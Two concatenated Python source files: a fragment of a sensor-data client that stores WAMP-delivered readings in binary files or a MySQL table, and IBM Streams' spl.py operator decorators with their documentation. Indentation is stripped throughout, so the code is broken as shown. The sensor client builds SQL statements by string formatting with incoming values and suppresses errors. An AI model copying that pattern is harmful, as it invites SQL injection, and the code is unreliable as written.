sensorid = row[0]
module = row[1]
line = row[2]
if self.output == 'file':
# missing namelst, unitlst and multilst - create dicts for that based on STANDARD
packcode = '6hL'
multiplier = 100000
namelst = [elem for elem in NAMEDICT[module]]
unitlst = [elem for elem in UNITDICT[module]]
if module == 'ow':
# TODO
if not len(line) == len(paralst):
if len(line) == 2:
paralst = ['time','t1']
namelst = ['T']
unitlst = ['degC']
elif len(line) == 5:
paralst = ['time','t1','var1','var2','var3','var4']
namelst = ['T','RH_P','VDD','VAD','VIS']
unitlst = ['degC','percent_mBar','V','V','V']
# check length of paralst and self.line
else:
pass
keylst = paralst[1:]
packcode = packcode + 'l'*len(keylst)
multilst = [multiplier]*len(keylst)
if not len(line) == len(paralst):
# Output only for testing purpose if you dont want to smash your logs
#print("ERRRRRRRRRRRRRRRRRRRRROR")
self.line = []
else:
for i, elem in enumerate(line):
if i == 0:
datearray = timeToArray(line[0])
else:
datearray.append(int(line[i]*multiplier))
day = datetime.strftime((datetime.strptime(line[0],"%Y-%m-%d %H:%M:%S.%f")),'%Y-%m-%d')
line = []
try:
header = "# MagPyBin %s %s %s %s %s %s %d" % (sensorid, str(keylst), str(namelst), str(unitlst), str(multilst), packcode, struct.calcsize(packcode))
data_bin = struct.pack(packcode,*datearray)
dataToFile(os.path.join(destpath,'MartasFiles'), sensorid, day, data_bin, header)
except:
#print("error")
pass
else:
"""
Please note:
Data is always automatically appended to datainfoid 0001
"""
if module == 'ow':
# DB request is necessary as sensorid has no revision information
sql = "SELECT SensorID, SensorGroup, SensorType FROM SENSORS WHERE SensorID LIKE '%s%%'" % sensorid
self.cursor.execute(sql)
results = self.cursor.fetchall()
sid = results[-1][0]
sgr = results[-1][1]
sty = results[-1][2]
datainfoid = sid+'_'+revnumber
if sty == 'DS18B20':
paralst = ['time','t1']
elif sty == 'DS2438':
if sgr == 'humidity':
paralst = ['time', 't1', 'var1', 'var2', 'var3', 'var4']
elif sgr == 'pressure':
paralst = ['time', 't1', 'var1', 'var2', 'var3', 'var4']
else:
paralst = ['time', 't1', 'var1', 'var2', 'var3', 'var4']
self.typ = 'ow'
else:
datainfoid = sensorid+'_0001'
# define insert from provided param
parastr = ', '.join(paralst)
# separate floats and string
nelst = []
for elem in line:
if isinstance(elem, str):
elem = "'"+elem+"'"
nelst.append(elem)
linestr = ', '.join(map(str, nelst))
sql = "INSERT INTO %s(%s) VALUES (%s)" % (datainfoid, parastr, linestr)
if printdata:
print("!!!!!!!!!!!!!!!! SQL !!!!!!!!!!!!!!", sql)
self.line = []
# Prepare SQL query to INSERT a record into the database.
try:
# Execute the SQL command
self.cursor.execute(sql)
# Commit your changes in the database
self.db.commit()
except:
# No regular output here. Otherwise log-file will be smashed
#print("client: could not append data to table")
# Rollback in case there is any error
self.db.rollback()
def storeData(self,array,paralst):
for row in array:
self.storeDataLine(row,paralst)
def sortAndFilter(self,array):
# 1) Sorts array into subarrays with identical sensorids
sens = array[0][:]
print(sens)
#print list(set(sens))
# 2) for each subarray:
# filter the dataset
# save the subarray
pass
def onEvent(self, topicUri, event):
eventdict = self.convertUnicode(event)
time = ''
eol = ''
try:
sensorid = topicUri.split('/')[-1].split('-')[0].split('#')[1]
module = topicUri.split('/')[-1].split('-')[0].split('#')[0]
#print sensorid, module
if module.startswith('pos') or module.startswith('gsm') or module.startswith('cs'):
self.typ = 'f'
if eventdict['id'] == 99:
eol = eventdict['value']
if eol == '':
if eventdict['id'] in MODIDDICT[module]: # replace by some eol parameter
if eventdict['id']==1: # round time to milliseconds
ar = eventdict['value'].split('.')
millsec= int(np.round(int(ar[1])/1000.)*1000.)
if millsec >= 1000000: ## accept up to one millisec error here
millsec == 999000
self.line.append(ar[0]+'.'+str(millsec).zfill(6))
else:
self.line.append(eventdict['value'])
else:
paralst = []
for elem in MODIDDICT[module]:
var = IDDICT[elem]
if var == 'time' and 'time' in paralst:
var = 'sectime'
paralst.append(var)
if printdata:
print("Received from %s: %s" % (sensorid,str(self.line)))
row = [sensorid, module, self.line]
self.bufferarray.append(row)
if len(self.bufferarray) > 100:
self.bufferarray = self.bufferarray[-100:]
self.count += 1
self.line=[]
#self.savedirectly = False
critvalue = 90
if self.savedirectly:
self.count = 0
array = self.bufferarray[-1:]
self.storeData(array,paralst)
# if filter:
# add a filter function after 100 to 1000 steps?
else:
if self.count == critvalue:
# Begin of buffered save
begin = datetime.utcnow()
array = self.bufferarray[-self.count:]
print("Lengths", len(array), self.count)
self.count = 0
#self.storeData(array,paralst)
p1 = multiprocessing.Process(target=self.storeData, args=(array,paralst,))
p2 = multiprocessing.Process(target=self.sortAndFilter, args=(array,))
p1.start()
p2.start()
p1.join()
p2.join()
print("Duration of buffered save", datetime.utcnow()-begin)
except:
pass
|
spl.py | # coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2019
"""
SPL Python primitive operators.
********
Overview
********
SPL primitive operators that call a Python function or
class methods are created by decorators provided by this module.
The name of the function or callable class becomes the name of the
operator.
A decorated function is a stateless operator while a decorated class
is an optionally stateful operator.
These are the supported decorators that create an SPL operator:
* :py:class:`@spl.source <source>` - Creates a source operator that produces tuples.
* :py:class:`@spl.filter <filter>` - Creates a operator that filters tuples.
* :py:class:`@spl.map <map>` - Creates a operator that maps input tuples to output tuples.
* :py:class:`@spl.for_each <for_each>` - Creates a operator that terminates a stream processing each tuple.
* :py:class:`@spl.primitive_operator <primitive_operator>` - Creates an SPL primitive operator that has an arbitrary number of input and output ports.
Decorated functions and classes must be located in the directory
``opt/python/streams`` in the SPL toolkit. Each module in that directory
will be inspected for operators during extraction. Each module defines
the SPL namespace for its operators by the function ``spl_namespace``,
for example::
from streamsx.spl import spl
def spl_namespace():
return 'com.example.ops'
@spl.map()
def Pass(*tuple_):
return tuple_
creates a pass-through operator ``com.example.ops::Pass``.
SPL primitive operators are created by executing the extraction script :ref:`spl-py-extract` against the SPL toolkit. Once created the operators become part
of the toolkit and may be used like any other SPL operator.
*******************************
Python classes as SPL operators
*******************************
Overview
========
Decorating a Python class creates a stateful SPL operator
where the instance fields of the class are the operator's state. An instance
of the class is created when the SPL operator invocation is initialized
at SPL runtime. The instance of the Python class is private to the SPL
operator and is maintained for the lifetime of the operator.
If the class has instance fields then they are the state of the
operator and are private to each invocation of the operator.
If the `__init__` method has parameters beyond the first
`self` parameter then they are mapped to operator parameters.
Any parameter that has a default value becomes an optional parameter
to the SPL operator. Parameters of the form `\*args` and `\*\*kwargs`
are not supported.
.. warning::
Parameter names must be valid SPL identifers,
SPL identifiers start with an ASCII letter or underscore,
followed by ASCII letters, digits, or underscores.
The name also must not be an SPL keyword.
Parameter names ``suppress`` and ``include`` are reserved.
The value of the operator parameters at SPL operator invocation are passed
to the `__init__` method. This is equivalent to creating an instance
of the class passing the operator parameters into the constructor.
For example, with this decorated class producing an SPL source
operator::
@spl.source()
class Range(object):
def __init__(self, stop, start=0):
self.start = start
self.stop = stop
def __iter__(self):
return zip(range(self.start, self.stop))
The SPL operator `Range` has two parameters, `stop` is mandatory and `start` is optional, defaulting to zero. Thus the SPL operator may be invoked as::
// Produces the sequence of values from 0 to 99
//
// Creates an instance of the Python class
// Range using Range(100)
//
stream<int32 seq> R = Range() {
param
stop: 100;
}
or both operator parameters can be set::
// Produces the sequence of values from 50 to 74
//
// Creates an instance of the Python class
// Range using Range(75, 50)
//
stream<int32 seq> R = Range() {
param
start: 50;
stop: 75;
}
Operator state
==============
Use of a class allows the operator to be stateful by maintaining state in instance
attributes across invocations (tuple processing).
When the operator is in a consistent region or checkpointing then it is serialized using `dill`. The default serialization may be modified by using the standard Python pickle mechanism of ``__getstate__`` and ``__setstate__``. This is required if the state includes objects that cannot be serialized, for example file descriptors. For details see See https://docs.python.org/3.5/library/pickle.html#handling-stateful-objects .
If the class has ``__enter__`` and ``__exit__`` context manager methods then ``__enter__`` is called after the instance has been deserialized by `dill`. Thus ``__enter__`` is used to recreate runtime objects that cannot be serialized such as open files or sockets.
Operator initialization & shutdown
==================================
Execution of an instance for an operator effectively run in a context manager so that an instance's ``__enter__``
method is called when the processing element containing the operator is initialized
and its ``__exit__`` method called when the processing element is stopped. To take advantage of this
the class must define both ``__enter__`` and ``__exit__`` methods.
.. note::
Initialization such as opening files should be in ``__enter__``
in order to support stateful operator restart & checkpointing.
Example of using ``__enter__`` and ``__exit__`` to open and close a file::
import streamsx.ec as ec
@spl.map()
class Sentiment(object):
def __init__(self, name):
self.name = name
self.file = None
def __enter__(self):
self.file = open(self.name, 'r')
def __exit__(self, exc_type, exc_value, traceback):
if self.file is not None:
self.file.close()
def __call__(self):
pass
When an instance defines a valid ``__exit__`` method then it will be called with an exception when:
* the instance raises an exception during processing of a tuple
* a data conversion exception is raised converting a Python value to an SPL tuple or attribute
If ``__exit__`` returns a true value then the exception is suppressed and processing continues, otherwise the enclosing processing element will be terminated.
Application log and trace
=========================
IBM Streams provides application trace and log services which are
accesible through standard Python loggers from the `logging` module.
See :ref:`streams_app_log_trc`.
*********************************
Python functions as SPL operators
*********************************
Decorating a Python function creates a stateless SPL operator.
In SPL terms this is similar to an SPL Custom operator, where
the code in the Python function is the custom code. For
operators with input ports the function is called for each
input tuple, passing a Python representation of the SPL input tuple.
For an SPL source operator the function is called to obtain an iterable
whose contents will be submitted to the output stream as SPL tuples.
Operator parameters are not supported.
An example SPL sink operator that prints each input SPL tuple after
its conversion to a Python tuple::
@spl.for_each()
def PrintTuple(*tuple_):
"Print each tuple to standard out."
print(tuple_, flush=True)
.. _spl-tuple-to-python:
*******************************
Processing SPL tuples in Python
*******************************
SPL tuples are converted to Python objects and passed to a decorated callable.
Overview
========
For each SPL tuple arriving at an input port a Python function is called with
the SPL tuple converted to Python values suitable for the function call.
How the tuple is passed is defined by the tuple passing style.
Tuple Passing Styles
====================
An input tuple can be passed to Python function using a number of different styles:
* *dictionary*
* *tuple*
* *attributes by name* **not yet implemented**
* *attributes by position*
Dictionary
----------
Passing the SPL tuple as a Python dictionary is flexible
and makes the operator independent of any schema.
A disadvantage is the reduction in code readability
for Python function by not having formal parameters,
though getters such as ``tuple['id']`` mitigate that to some extent.
If the function is general purpose and can derive meaning
from the keys that are the attribute names then ``**kwargs`` can be useful.
When the only function parameter is ``**kwargs``
(e.g. ``def myfunc(**tuple_):``) then the passing style is *dictionary*.
All of the attributes are passed in the dictionary
using the SPL schema attribute name as the key.
Tuple
-----
Passing the SPL tuple as a Python tuple is flexible
and makes the operator independent of any schema
but is brittle to changes in the SPL schema.
Another disadvantage is the reduction in code readability
for Python function by not having formal parameters.
However if the function is general purpose and independent
of the tuple contents ``*args`` can be useful.
When the only function parameter is ``*args``
(e.g. ``def myfunc(*tuple_):``) then the passing style is *tuple*.
All of the attributes are passed as a Python tuple
with the order of values matching the order of the SPL schema.
Attributes by name
------------------
(**not yet implemented**)
Passing attributes by name can be robust against changes
in the SPL scheme, e.g. additional attributes being added in
the middle of the schema, but does require that the SPL schema
has matching attribute names.
When *attributes by name* is used then SPL tuple attributes
are passed to the function by name for formal parameters.
Order of the attributes and parameters need not match.
This is supported for function parameters of
kind ``POSITIONAL_OR_KEYWORD`` and ``KEYWORD_ONLY``.
If the function signature also contains a parameter of the form
``**kwargs`` (``VAR_KEYWORD``) then any attributes not bound to
formal parameters are passed in its dictionary using the
SPL schema attribute name as the key.
If the function signature also contains an arbitrary argument
list ``*args`` then any attributes not bound to formal parameters
or to ``**kwargs`` are passed in order of the SPL schema.
If there are only formal parameters any non-bound attributes
are not passed into the function.
Attributes by position
----------------------
Passing attributes by position allows the SPL operator to
be independent of the SPL schema but is brittle to
changes in the SPL schema. For example a function expecting
an identifier and a sensor reading as the first two attributes
would break if an attribute representing region was added as
the first SPL attribute.
When *attributes by position* is used then SPL tuple attributes are
passed to the function by position for formal parameters.
The first SPL attribute in the tuple is passed as the first parameter.
This is supported for function parameters of kind `POSITIONAL_OR_KEYWORD`.
If the function signature also contains an arbitrary argument
list `\*args` (`VAR_POSITIONAL`) then any attributes not bound
to formal parameters are passed in order of the SPL schema.
The function signature must not contain a parameter of the form
``**kwargs`` (`VAR_KEYWORD`).
If there are only formal parameters any non-bound attributes
are not passed into the function.
The SPL schema must have at least the number of positional arguments
the function requires.
Selecting the style
===================
For signatures only containing a parameter of the form
``*args`` or ``**kwargs`` the style is implicitly defined:
* ``def f(**tuple_)`` - *dictionary* - ``tuple_`` will contain a dictionary of all of the SPL tuple attribute's values with the keys being the attribute names.
* ``def f(*tuple_)`` - *tuple* - ``tuple_`` will contain all of the SPL tuple attribute's values in order of the SPL schema definition.
Otherwise the style is set by the ``style`` parameter to the decorator,
defaulting to *attributes by name*. The style value can be set to:
* ``'name'`` - *attributes by name* (the default)
* ``'position'`` - *attributes by position*
Examples
========
These examples show how an SPL tuple with the schema and value::
tuple<rstring id, float64 temp, boolean increase>
{id='battery', temp=23.7, increase=true}
is passed into a variety of functions by showing the effective Python
call and the resulting values of the function's parameters.
*Dictionary* consuming all attributes by ``**kwargs``::
@spl.map()
def f(**tuple_)
pass
# f({'id':'battery', 'temp':23.7, 'increase': True})
# tuple_={'id':'battery', 'temp':23.7, 'increase':True}
*Tuple* consuming all attributes by ``*args``::
@spl.map()
def f(*tuple_)
pass
# f('battery', 23.7, True)
# tuple_=('battery',23.7, True)
*Attributes by name* consuming all attributes::
@spl.map()
def f(id, temp, increase)
pass
# f(id='battery', temp=23.7, increase=True)
# id='battery'
# temp=23.7
# increase=True
*Attributes by name* consuming a subset of attributes::
@spl.map()
def f(id, temp)
pass
# f(id='battery', temp=23.7)
# id='battery'
# temp=23.7
*Attributes by name* consuming a subset of attributes in a different order::
@spl.map()
def f(increase, temp)
pass
# f(temp=23.7, increase=True)
# increase=True
# temp=23.7
*Attributes by name* consuming `id` by name and remaining attributes by ``**kwargs``::
@spl.map()
def f(id, **tuple_)
pass
# f(id='battery', {'temp':23.7, 'increase':True})
# id='battery'
# tuple_={'temp':23.7, 'increase':True}
*Attributes by name* consuming `id` by name and remaining attributes by ``*args``::
@spl.map()
def f(id, *tuple_)
pass
# f(id='battery', 23.7, True)
# id='battery'
# tuple_=(23.7, True)
*Attributes by position* consuming all attributes::
@spl.map(style='position')
def f(key, value, up)
pass
# f('battery', 23.7, True)
# key='battery'
# value=23.7
# up=True
*Attributes by position* consuming a subset of attributes::
@spl.map(style='position')
def f(a, b)
pass
# f('battery', 23.7)
# a='battery'
# b=23.7
*Attributes by position* consuming `id` by position and remaining attributes by ``*args``::
@spl.map(style='position')
def f(key, *tuple_)
pass
# f('battery', 23.7, True)
# key='battery'
# tuple_=(23.7, True)
In all cases the SPL tuple must be able to provide all parameters
required by the function. If the SPL schema is insufficient then
an error will result, typically an SPL compile time error.
The SPL schema can provide a subset of the formal parameters if the
remaining attributes are optional (having a default).
*Attributes by name* consuming a subset of attributes with an optional parameter not matched by the schema::
@spl.map()
def f(id, temp, pressure=None)
pass
# f(id='battery', temp=23.7)
# id='battery'
# temp=23.7
# pressure=None
.. _submit-from-python:
************************************
Submission of SPL tuples from Python
************************************
The return from a decorated callable results in submission of SPL tuples
on the associated outut port.
A Python function must return:
* ``None``
* a Python tuple
* a Python dictionary
* a list containing any of the above.
None
====
When ``None`` is return then no tuple will be submitted to
the operator output port.
Python tuple
============
When a Python tuple is returned it is converted to an SPL tuple and
submitted to the output port.
The values of a Python tuple are assigned to an output SPL tuple by position,
so the first value in the Python tuple is assigned to the first attribute
in the SPL tuple::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return (a,b,a+b)
# The SPL output will be:
# All values explictly set by returned Python tuple
# based on the x,y values from the input tuple
# x is set to: x
# y is set to: y
# z is set to: x+y
The returned tuple may be *sparse*, any attribute value in the tuple
that is ``None`` will be set to their SPL default or copied from
a matching attribute in the input tuple
(same name and type,
or same name and same type as the underlying type of an output attribute
with an optional type),
depending on the operator kind::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return (a,None,a+b)
# The SPL output will be:
# x is set to: x (explictly set by returned Python tuple)
# y is set to: y (set by matching input SPL attribute)
# z is set to: x+y
When a returned tuple has fewer values than attributes in the SPL output
schema the attributes not set by the Python function will be set
to their SPL default or copied from
a matching attribute in the input tuple
(same name and type,
or same name and same type as the underlying type of an output attribute
with an optional type),
depending on the operator kind::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return a,
# The SPL output will be:
# x is set to: x (explictly set by returned Python tuple)
# y is set to: y (set by matching input SPL attribute)
# z is set to: 0 (default int32 value)
When a returned tuple has more values than attributes in the SPL output schema then the additional values are ignored::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return (a,b,a+b,a/b)
# The SPL output will be:
# All values explictly set by returned Python tuple
# based on the x,y values from the input tuple
# x is set to: x
# y is set to: y
# z is set to: x+y
#
# The fourth value in the tuple a/b = x/y is ignored.
Python dictionary
=================
A Python dictionary is converted to an SPL tuple for submission to
the associated output port. An SPL attribute is set from the
dictionary if the dictionary contains a key equal to the attribute
name. The value is used to set the attribute, unless the value is
``None``.
If the value in the dictionary is ``None``, or no matching key exists,
then the attribute value is set to its SPL default or copied from
a matching attribute in the input tuple (same name and type,
or same name and same type as the underlying type of an output attribute
with an optional type), depending on the operator kind.
Any keys in the dictionary that do not map to SPL attribute names are ignored.
Python list
===========
When a list is returned, each value is converted to an SPL tuple and
submitted to the output port, in order of the list starting with the
first element (position 0). If the list contains `None` at an index
then no SPL tuple is submitted for that index.
The list must only contain Python tuples, dictionaries or `None`. The list
can contain a mix of valid values.
The list may be empty resulting in no tuples being submitted.
"""
from enum import Enum
__all__ = ['source', 'map', 'filter', 'for_each', 'PrimitiveOperator', 'input_port', 'primitive_operator', 'extracting', 'ignore']
import functools
import inspect
import re
import sys
import streamsx.ec as ec
import streamsx._streams._runtime
import importlib
import warnings
import streamsx._streams._version
__version__ = streamsx._streams._version.__version__
# Used to recreate instances of decorated operators
# from their module & class name during pickleling (dill)
# See __reduce__ implementation below
def _recreate_op(op_module, op_name):
module_ = importlib.import_module(op_module)
class_ = getattr(module_, op_name)
return class_.__new__(class_)
_OperatorType = Enum('_OperatorType', 'Ignore Source Sink Pipe Filter Primitive')
_OperatorType.Source.spl_template = 'PythonFunctionSource'
_OperatorType.Pipe.spl_template = 'PythonFunctionPipe'
_OperatorType.Sink.spl_template = 'PythonFunctionSink'
_OperatorType.Filter.spl_template = 'PythonFunctionFilter'
_OperatorType.Primitive.spl_template = 'PythonPrimitive'
_SPL_KEYWORDS = {'as', 'attribute',
'blob', 'boolean', 'break',
'complex32', 'complex64', 'composite', 'config', 'continue',
'decimal128', 'decimal32', 'decimal64', 'do',
'else', 'enum', 'expression',
'false', 'float32', 'float64', 'for', 'function',
'graph',
'if', 'in', 'input', 'int', 'int16', 'int32', 'int64', 'int8',
'list', 'logic',
'map', 'mutable',
'namespace', 'null',
'onProcess', 'onPunct', 'onTuple', 'operator', 'optional', 'output',
'param', 'public',
'return', 'rstring',
'set', 'state', 'stateful', 'static', 'stream', 'streams',
'timestamp', 'true', 'tuple', 'type',
'uint16', 'uint32', 'uint64', 'uint8', 'use', 'ustring',
'void',
'while', 'window',
'xml'}
def _is_identifier(id):
return re.match('^[a-zA-Z_][a-zA-Z_0-9]*$', id) and id not in _SPL_KEYWORDS
def _valid_identifier(id):
if not _is_identifier(id):
raise ValueError("{0} is not a valid SPL identifier".format(id))
def _valid_op_parameter(name):
_valid_identifier(name)
if name in ['suppress', 'include']:
raise ValueError("Parameter name {0} is reserved".format(name))
_EXTRACTING=False
def extracting():
"""Is a module being loaded by ``spl-python-extract``.
This can be used by modules defining SPL primitive operators
using decorators such as :py:class:`@spl.map <map>`, to avoid
runtime behavior. Typically not importing modules that are
not available locally. The extraction script loads the module
to determine method signatures and thus does not invoke any methods.
For example if an SPL toolkit with primitive operators requires
a package ``extras`` and is using ``opt/python/streams/requirements.txt``
to include it, then loading it at extraction time can be avoided by::
from streamsx.spl import spl
def spl_namespace():
return 'myns.extras'
if not spl.extracting():
import extras
@spl.map():
def myextras(*tuple_):
return extras.process(tuple_)
.. versionadded:: 1.11
"""
return _EXTRACTING
#
# Wrap object for an SPL operator, either
# a callable class or function.
#
def _wrapforsplop(optype, wrapped, style, docpy):
if inspect.isclass(wrapped):
if not callable(wrapped):
raise TypeError('Class must be callable')
_valid_identifier(wrapped.__name__)
class _op_class(wrapped):
__doc__ = wrapped.__doc__
_splpy_wrapped = wrapped
_splpy_optype = optype
_splpy_callable = 'class'
_streamsx_ec_cls = True
_streamsx_ec_context = streamsx._streams._runtime._has_context_methods(wrapped)
@functools.wraps(wrapped.__init__)
def __init__(self,*args,**kwargs):
super(_op_class, self).__init__(*args,**kwargs)
self._streamsx_ec_entered = False
# Use reduce to save the state of the class and its
# module and operator name.
def __reduce__(self):
if hasattr(self, '__getstate__'):
state = self.__getstate__()
else:
state = self.__dict__
return _recreate_op, (wrapped.__module__, wrapped.__name__), state
if optype in (_OperatorType.Sink, _OperatorType.Pipe, _OperatorType.Filter):
_op_class._splpy_style = _define_style(wrapped, wrapped.__call__, style)
_op_class._splpy_fixed_count = _define_fixed(_op_class, _op_class.__call__)
else:
_op_class._splpy_style = ''
_op_class._splpy_fixed_count = -1
_op_class._splpy_file = inspect.getsourcefile(wrapped)
_op_class._splpy_docpy = docpy
return _op_class
if not inspect.isfunction(wrapped):
raise TypeError('A function or callable class is required')
_valid_identifier(wrapped.__name__)
#fnstyle =
#if fnstyle == 'tuple':
# @functools.wraps(wrapped)
# def _op_fn(*args):
# return wrapped(args)
#else:
# @functools.wraps(wrapped)
# def _op_fn(*args, **kwargs):
# return wrapped(*args, **kwargs)
_op_fn = wrapped
_op_fn._splpy_optype = optype
_op_fn._splpy_callable = 'function'
_op_fn._splpy_style = _define_style(_op_fn, _op_fn, style)
_op_fn._splpy_fixed_count = _define_fixed(_op_fn, _op_fn)
_op_fn._splpy_file = inspect.getsourcefile(wrapped)
_op_fn._splpy_docpy = docpy
_op_fn._streamsx_ec_cls = False
_op_fn._streamsx_ec_context = False
return _op_fn
# define the SPL tuple passing style based
# upon the function signature and the decorator
# style parameter
def _define_style(wrapped, fn, style):
has_args = False
has_kwargs = False
has_positional = False
req_named = False
pmds = inspect.signature(fn).parameters
itpmds = iter(pmds)
# Skip self
if inspect.isclass(wrapped):
next(itpmds)
pc = 0
for pn in itpmds:
pmd = pmds[pn]
if pmd.kind == inspect.Parameter.POSITIONAL_ONLY:
raise TypeError('Positional only parameters are not supported:' + pn)
elif pmd.kind == inspect.Parameter.VAR_POSITIONAL:
has_args = True
elif pmd.kind == inspect.Parameter.VAR_KEYWORD:
has_kwargs = True
elif pmd.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:
has_positional = True
elif pmd.kind == inspect.Parameter.KEYWORD_ONLY:
if pmd.default is inspect.Parameter.empty:
req_named = True
pc +=1
# See if the requested style matches the signature.
if style == 'position':
if req_named:
raise TypeError("style='position' not supported with a required named parameter.")
elif pc == 1 and has_kwargs:
raise TypeError("style='position' not supported with single **kwargs parameter.")
elif pc == 1 and has_args:
pass
elif not has_positional:
raise TypeError("style='position' not supported as no positional parameters exist.")
# From an implementation point of view the values
# are passed as a tuple and Python does the correct mapping
style = 'tuple'
elif style == 'name':
if pc == 1 and has_args:
raise TypeError("style='name' not supported with single *args parameter.")
elif pc == 1 and has_kwargs:
raise TypeError("style='name' not supported with single **kwargs parameter.")
elif style is not None:
raise TypeError("style=" + style + " unknown.")
if style is None:
if pc == 1 and has_kwargs:
style = 'dictionary'
elif pc == 1 and has_args:
style = 'tuple'
elif pc == 0:
style = 'tuple'
else:
# Default to by name
style = 'name'
if style == 'tuple' and has_kwargs:
raise TypeError("style='position' not implemented with **kwargs parameter.")
if style == 'name':
raise TypeError("Not yet implemented!")
return style
def _define_fixed(wrapped, callable_):
"""For the callable see how many positional parameters are required"""
is_class = inspect.isclass(wrapped)
style = callable_._splpy_style if hasattr(callable_, '_splpy_style') else wrapped._splpy_style
if style == 'dictionary':
return -1
fixed_count = 0
if style == 'tuple':
sig = inspect.signature(callable_)
pmds = sig.parameters
itpmds = iter(pmds)
# Skip 'self' for classes
if is_class:
next(itpmds)
for pn in itpmds:
param = pmds[pn]
if param.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:
fixed_count += 1
if param.kind == inspect.Parameter.VAR_POSITIONAL: # *args
fixed_count = -1
break
if param.kind == inspect.Parameter.VAR_KEYWORD:
break
return fixed_count
class source(object):
"""
Create a source SPL operator from an iterable.
The resulting SPL operator has a single output port.
When decorating a class the class must be iterable
having an ``__iter__`` function. When the SPL operator
is invoked an instance of the class is created
and an iteration is created using ``iter(instance)``.
When decoratiing a function the function must have no
parameters and must return an iterable or iteration.
When the SPL operator is invoked the function is called
and an iteration is created using ``iter(value)``
where ``value`` is the return of the function.
For each value in the iteration SPL zero or more tuples
are submitted to the output port, derived from the value,
see :ref:`submit-from-python`.
If the iteration completes then no more tuples
are submitted and a window punctuation mark followed
by final punctuation mark are submitted to the output port.
Example definition::
@spl.source()
class Range(object):
def __init__(self, stop, start=0):
self.start = start
self.stop = stop
def __iter__(self):
return zip(range(self.start, self.stop))
Example SPL invocation::
stream<int32 seq> R = Range() {
param
stop: 100;
}
If ``__iter__`` or ``__next__`` block then shutdown, checkpointing
or consistent region processing may be delayed. Having ``__next__``
return ``None`` (no available tuples) or tuples to submit
will allow such processing to proceed.
A shutdown ``threading.Event`` is available through
:py:func:`streamsx.ec.shutdown` which becomes set when a shutdown
of the processing element has been requested. This event my be waited
on to perform a sleep that will terminate upon shutdown.
Args:
docpy: Copy Python docstrings into SPL operator model for SPLDOC.
Exceptions raised by ``__iter__`` and ``__next__`` can be suppressed
when this decorator wraps a class with context manager
``__enter__`` and ``__exit__`` methods.
If ``__exit__`` returns a true value when called with an exception
then the exception is suppressed.
Suppressing an exception raised by ``__iter__`` results in the
source producing an empty iteration. No tuples will be submitted.
Suppressing an exception raised by ``__next__`` results in the
source not producing any tuples for that invocation. Processing
continues with a call to ``__next__``.
Data conversion errors of the value returned by ``__next__`` can
also be suppressed by ``__exit__``.
If ``__exit__`` returns a true value when called with the exception
then the exception is suppressed and the value that caused the
exception is not submitted as an SPL tuple.
"""
def __init__(self, docpy=True):
self.style = None
self.docpy = docpy
def __call__(self, wrapped):
decorated = _wrapforsplop(_OperatorType.Source, wrapped, self.style, self.docpy)
if inspect.isclass(decorated):
decorated._splpy_decor = str(self)
return decorated
def __str__(self):
s = ''
if not self.docpy:
if s:
s += ', '
s += 'docpy=False'
return '@spl.source(' + s + ')'
class map(object):
"""
Decorator to create a map SPL operator from a callable class or function.
Creates an SPL operator with a single input port and a single
output port. For each tuple on the input port the
callable is called passing the contents of the tuple.
The value returned from the callable results in
zero or more tuples being submitted to the operator output
port, see :ref:`submit-from-python`.
Example definition::
@spl.map()
class AddSeq(object):
\"\"\"Add a sequence number as the last attribute.\"\"\"
def __init__(self):
self.seq = 0
def __call__(self, *tuple_):
id = self.seq
self.seq += 1
return tuple_ + (id,)
Example SPL invocation::
stream<In, tuple<uint64 seq>> InWithSeq = AddSeq(In) { }
Args:
style: How the SPL tuple is passed into Python callable or function, see :ref:`spl-tuple-to-python`.
docpy: Copy Python docstrings into SPL operator model for SPLDOC.
Exceptions raised by ``__call__`` can be suppressed when this decorator
wraps a class with context manager ``__enter__`` and ``__exit__`` methods.
If ``__exit__`` returns a true value when called with the exception
then the exception is suppressed and the tuple that caused the
exception is dropped.
Data conversion errors of the value returned by ``__call__`` can
also be suppressed by ``__exit__``.
If ``__exit__`` returns a true value when called with the exception
then the exception is suppressed and the value that caused the
exception is not submitted as an SPL tuple.
"""
def __init__(self, style=None, docpy=True):
self.style = style
self.docpy = docpy
def __call__(self, wrapped):
decorated = _wrapforsplop(_OperatorType.Pipe, wrapped, self.style, self.docpy)
if inspect.isclass(decorated):
decorated._splpy_decor = str(self)
return decorated
def __str__(self):
s = ''
if self.style is not None:
s += 'style=' + str(self.style)
if not self.docpy:
if s:
s += ', '
s += 'docpy=False'
return '@spl.map(' + s + ')'
class filter(object):
"""
Decorator that creates a filter SPL operator from a callable class or function.
A filter SPL operator has a single input port and one mandatory
and one optional output port. The schema of each output port
must match the input port. For each tuple on the input port the
callable is called passing the contents of the tuple. if the
function returns a value that evaluates to True then it is
submitted to mandatory output port 0. Otherwise it it submitted to
the second optional output port (1) or discarded if the port is
not specified in the SPL invocation.
Args:
style: How the SPL tuple is passed into Python callable or function, see :ref:`spl-tuple-to-python`.
docpy: Copy Python docstrings into SPL operator model for SPLDOC.
Example definition::
@spl.filter()
class AttribThreshold(object):
\"\"\"
Filter based upon a single attribute being
above a threshold.
\"\"\"
def __init__(self, attr, threshold):
self.attr = attr
self.threshold = threshold
def __call__(self, **tuple_):
return tuple_[self.attr] > self.threshold:
Example SPL invocation::
stream<rstring id, float64 voltage> Sensors = ...
stream<Sensors> InterestingSensors = AttribThreshold(Sensors) {
param
attr: "voltage";
threshold: 225.0;
}
Exceptions raised by ``__call__`` can be suppressed when this decorator
wraps a class with context manager ``__enter__`` and ``__exit__`` methods.
If ``__exit__`` returns a true value when called with the exception
then the expression is suppressed and the tuple that caused the
exception is dropped.
"""
def __init__(self, style=None, docpy=True):
self.style = style
self.docpy = docpy
def __call__(self, wrapped):
decorated = _wrapforsplop(_OperatorType.Filter, wrapped, self.style, self.docpy)
if inspect.isclass(decorated):
decorated._splpy_decor = str(self)
return decorated
